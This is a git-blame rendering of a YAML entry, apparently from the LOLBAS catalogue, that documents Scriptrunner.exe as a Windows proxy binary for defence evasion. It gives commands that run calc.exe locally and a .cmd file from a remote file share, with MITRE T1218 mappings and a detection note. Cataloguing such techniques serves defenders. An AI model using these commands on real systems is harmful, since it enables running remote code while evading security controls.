2018-06-09 00:15:06 +02:00
|
|
|
---
|
|
|
|
Name: Scriptrunner.exe
|
2021-01-10 16:04:52 +01:00
|
|
|
Description:
|
2018-09-24 21:59:43 +02:00
|
|
|
Author: 'Oddvar Moe'
|
2021-01-10 16:04:52 +01:00
|
|
|
Created: 2018-05-25
|
2018-06-09 00:15:06 +02:00
|
|
|
Commands:
|
|
|
|
- Command: Scriptrunner.exe -appvscript calc.exe
|
2018-09-24 21:59:43 +02:00
|
|
|
Description: Executes calc.exe
|
|
|
|
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-06-09 00:15:06 +02:00
|
|
|
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
2018-09-24 21:59:43 +02:00
|
|
|
Description: Executes calc.cmde from remote server
|
|
|
|
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-12-10 14:28:12 +01:00
|
|
|
Full_Path:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Path: C:\Windows\System32\scriptrunner.exe
|
|
|
|
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
2021-01-10 16:04:52 +01:00
|
|
|
Code_Sample:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Code:
|
|
|
|
Detection:
|
|
|
|
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Link: https://twitter.com/KyleHanslovan/status/914800377580503040
|
|
|
|
- Link: https://twitter.com/NickTyrer/status/914234924655312896
|
|
|
|
- Link: https://github.com/MoooKitty/Code-Execution
|
|
|
|
Acknowledgement:
|
|
|
|
- Person: Nick Tyrer
|
|
|
|
Handle: '@nicktyrer'
|
2021-01-10 16:04:52 +01:00
|
|
|
---
|